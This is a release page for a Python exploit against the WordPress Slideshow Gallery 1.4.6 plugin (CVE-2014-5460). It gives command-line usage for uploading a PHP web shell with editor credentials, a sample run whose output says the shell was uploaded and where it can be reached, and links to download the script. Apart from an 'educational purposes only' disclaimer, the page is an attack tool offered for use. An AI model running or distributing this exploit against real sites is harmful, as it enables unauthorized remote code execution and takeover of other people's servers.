WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit + Demo

WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit

[claudio@localhost ~]$ python wp_gallery_slideshow_146_suv.py -t http://localhost/wordpress -u editor -p editor -f sh33l.php


 $$$$$$\  $$\ $$\       $$\                     $$\
$$  __$$\ $$ |\__|      $$ |                    $$ |
$$ /  \__|$$ |$$\  $$$$$$$ | $$$$$$\   $$$$$$$\ $$$$$$$\   $$$$$$\  $$\  $$\  $$\
\$$$$$$\  $$ |$$ |$$  __$$ |$$  __$$\ $$  _____|$$  __$$\ $$  __$$\ $$ | $$ | $$ |
 \____$$\ $$ |$$ |$$ /  $$ |$$$$$$$$ |\$$$$$$\  $$ |  $$ |$$ /  $$ |$$ | $$ | $$ |
$$\   $$ |$$ |$$ |$$ |  $$ |$$   ____| \____$$\ $$ |  $$ |$$ |  $$ |$$ | $$ | $$ |
\$$$$$$  |$$ |$$ |\$$$$$$$ |\$$$$$$$\ $$$$$$$  |$$ |  $$ |\$$$$$$  |\$$$$$\$$$$  |
 \______/ \__|\__| \_______| \_______|\_______/ \__|  \__| \______/  \_____\____/



             $$$$$$\            $$\ $$\                                       $$\ $$\   $$\     $$$$$$\
            $$  __$$\           $$ |$$ |                                    $$$$ |$$ |  $$ |   $$  __$$\
            $$ /  \__| $$$$$$\  $$ |$$ | $$$$$$\   $$$$$$\  $$\   $$\       \_$$ |$$ |  $$ |   $$ /  \__|
            $$ |$$$$\  \____$$\ $$ |$$ |$$  __$$\ $$  __$$\ $$ |  $$ |        $$ |$$$$$$$$ |   $$$$$$$\
            $$ |\_$$ | $$$$$$$ |$$ |$$ |$$$$$$$$ |$$ |  \__|$$ |  $$ |        $$ |\_____$$ |   $$  __$$\
            $$ |  $$ |$$  __$$ |$$ |$$ |$$   ____|$$ |      $$ |  $$ |        $$ |      $$ |   $$ /  $$ |
            \$$$$$$  |\$$$$$$$ |$$ |$$ |\$$$$$$$\ $$ |      \$$$$$$$ |      $$$$$$\ $$\ $$ |$$\ $$$$$$  |
             \______/  \_______|\__|\__| \_______|\__|       \____$$ |      \______|\__|\__|\__|\______/
                                                            $$\   $$ |
                                                            \$$$$$$  |
                                                             \______/

                                                                   W0rdpr3ss Sl1d3sh04w G4ll3ry 1.4.6 Sh3ll Upl04d Vuln.

                          =============================================
                          - Release date: 2014-08-28
                          - Discovered by: Jesus Ramirez Pichardo
                          - CVE: 2014-5460
                          =============================================

                                          Written by:

                                        Claudio Viviani

                                     http://www.homelab.it

                                        info@homelab.it
                                     homelabit@protonmail.ch

                                https://www.facebook.com/homelabit
                                https://twitter.com/homelabit
                                https://plus.google.com/+HomelabIt1/
                      https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

[+] Username & password ACCEPTED!

[!] Shell Uploaded!
[+] Check url: http://localhost/wordpress/wp-content/uploads/slideshow-gallery/sh33l.php (lowercase!!!!)

Exploit Usage

python wp_gallery_slideshow_146_suv.py -t http[s]://localhost -u user -p pwd -f sh33l.php
python wp_gallery_slideshow_146_suv.py -t http[s]://localhost/dir -u user -p pwd -f sh33l.php
python wp_gallery_slideshow_146_suv.py -t http[s]://localhost:80|443 -u user -p pwd -f sh33l.php

Download

Download: wp_gallery_slideshow_146_suv.py
          wp_gallery_slideshow_146_suv.py (Mega Mirror)

Info

# WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit

# WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload   vulnerability (CVE-2014-5460)

# Vulnerability discovered by: Jesus Ramirez Pichardo - http://whitexploit.blogspot.mx/

# Exploit written by: Claudio Viviani - info@homelab.it - http://www.homelab.it

# Info:

# Any user could upload php files (administrator by default)

# Disclaimer:

# This exploit is intended for educational purposes only and the author
# can not be held liable for any kind of damages done whatsoever to your machine,
# or damages caused by some other,creative application of this exploit.
# In any case you disagree with the above statement,stop here.


# Requirements:

# 1) Enabled user for management slide
# 2) python's httplib2
#    Installation: pip install httplib2